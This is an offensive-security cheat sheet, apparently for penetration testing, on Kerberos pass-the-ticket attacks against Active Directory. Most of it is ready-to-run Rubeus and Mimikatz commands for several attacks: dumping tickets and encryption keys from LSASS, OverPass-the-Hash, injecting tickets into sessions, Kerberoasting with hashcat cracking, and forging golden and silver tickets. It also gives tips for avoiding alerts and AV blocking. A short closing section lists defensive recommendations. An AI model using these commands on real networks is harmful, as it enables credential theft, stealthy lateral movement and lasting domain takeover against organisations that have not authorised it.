π‘οΈ Methodology Checklist
- Extract tickets with Rubeus:
Rubeus.exe dump /nowrap - Or request TGT:
Rubeus.exe asktgt /user:[USER] /password:[PASS] /domain:[DOMAIN] - Import ticket:
Rubeus.exe ptt /ticket:[base64] - Verify:
klist - Access resource:
\\[TARGET]\shareor lateral move via psexec - Kerberoast:
Rubeus.exe kerberoast /outfile:hashes.txt /nowrap - Crack offline:
hashcat -m 13100 hashes.txt [wordlist]
π― Operational Context
Use when: Kerberos TGT or TGS stolen from LSASS or forged (Golden/Silver Ticket) β inject into current session for seamless domain service access.
Think Dumber First: Rubeus.exe ptt /ticket:[BASE64_TICKET] injects ticket into current logon session. Then klist to confirm. Then access target resources normally β Windows handles Kerberos transparently after injection.
Skip when: Ticket has expired β request a new one with valid credentials or forge with krbtgt hash (Golden Ticket).
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit | Export all Kerberos tickets to .kirbi files |
Rubeus.exe dump /nowrap | Dump tickets as Base64 (easier to transfer) |
mimikatz.exe "privilege::debug" "sekurlsa::ekeys" exit | Dump Kerberos encryption keys (AES256, RC4/NTLM) |
Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /rc4:[NT_HASH] /ptt | Request TGT from NTLM hash and inject (OverPass-the-Hash) |
Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /aes256:[AES_HASH] /ptt | Request TGT from AES256 key and inject |
Rubeus.exe ptt /ticket:C:\path\to\ticket.kirbi | Import .kirbi ticket into current session |
Rubeus.exe ptt /ticket:[BASE64_TICKET] | Import ticket from Base64 string |
mimikatz.exe "privilege::debug" "kerberos::ptt C:\path\to\ticket.kirbi" exit | Import .kirbi via Mimikatz |
klist | Verify tickets cached in current session |
Rubeus.exe klist | Rubeus-based ticket list |
klist purge | Clear all current session tickets |
dir \\DC01.[DOMAIN]\c$ | Test ticket access to DC filesystem |
Enter-PSSession -ComputerName DC01.[DOMAIN] | PowerShell remoting using injected ticket |
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show | Create sacrificial process (LUID) for isolated ticket injection |
π¬ Deep Dive & Workflow
TGT vs TGS
- TGT (
krbtgtservice) β proof of identity; used to request service tickets - TGS (specific service) β grants access to a single resource (CIFS, MSSQL, HTTP)
For lateral movement, TGTs are more valuable β they can generate any service ticket. TGS tickets are pre-baked for a single target.
Harvesting Tickets
Mimikatz exports tickets as .kirbi files β machine accounts end in $, target user TGTs have krbtgt in the filename. Rubeus dump /nowrap outputs Base64, easier to copy between machines than files.
OverPass-the-Hash (Pass-the-Key)
When you have a hash but no ticket, use the hash to request a fresh TGT from the KDC:
# Prefer AES256 on modern domains β RC4 may trigger alerts
Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /aes256:[HASH] /pttAES256 keys are extracted with sekurlsa::ekeys in Mimikatz (requires admin).
Sacrificial Process Technique
Inject a ticket into an isolated process to avoid overwriting your current sessionβs TGT:
# Step 1: Spawn a hidden CMD process with its own LUID
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
# Step 2: In the new CMD window, request + inject ticket
Rubeus.exe asktgt /user:[USER] /domain:[DOMAIN] /aes256:[HASH] /ptt
# Step 3: Use PowerShell Remoting from within that window
powershell
Enter-PSSession -ComputerName DC01Mimikatz Ticket Files
[0;6c680]-2-0-40e10000-john@krbtgt-inlanefreight.htb.kirbi β User TGT (target)
[0;3e7]-0-2-40a50000-DC01$@cifs-dc01.inlanefreight.htb.kirbi β Machine ticket (ignore)
Target files where the service is krbtgt and thereβs no $ in the username section.
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Rubeus not available | AV blocking | Use Mimikatz: kerberos::ptt ticket.kirbi; or impacket for Linux-side injection |
| klist shows ticket but access denied | Ticket for wrong SPN | Ensure ticket SPN matches target service; request new TGS: Rubeus.exe asktgs /ticket:[TGT] /service:cifs/[HOST] |
| Golden ticket fails | Wrong krbtgt hash or domain SID | Verify: domain SID from Get-DomainSID; krbtgt NTLM hash from DCSync; Mimikatz kerberos::golden |
| Silver ticket not working | Wrong service account hash or SPN | Silver ticket needs service account NTLM hash and correct SPN format: cifs/hostname |
| Ticket injection works but expires | Short ticket lifetime | Golden ticket default 10 years; for real tickets, request with long lifetime: Rubeus.exe asktgt /renewable /renewmax:99999 |
π Reporting Trigger
Finding Title: Kerberos Ticket Injection Enables Stealthy Lateral Movement Impact: Kerberos ticket injection bypasses credential requirements for domain service access, with Golden Tickets providing effectively permanent domain access that persists even after password resets (only krbtgt reset invalidates golden tickets). Root Cause: krbtgt NTLM hash compromised via DCSync. No detection of abnormal ticket lifetimes or forged PAC attributes in Kerberos tickets. Recommendation: Reset krbtgt password twice (with 24-hour gap) after any compromise. Deploy Microsoft Defender for Identity to detect Golden Ticket indicators (abnormal ticket lifetimes, missing PAC). Implement Privileged Access Workstations to prevent krbtgt hash exposure.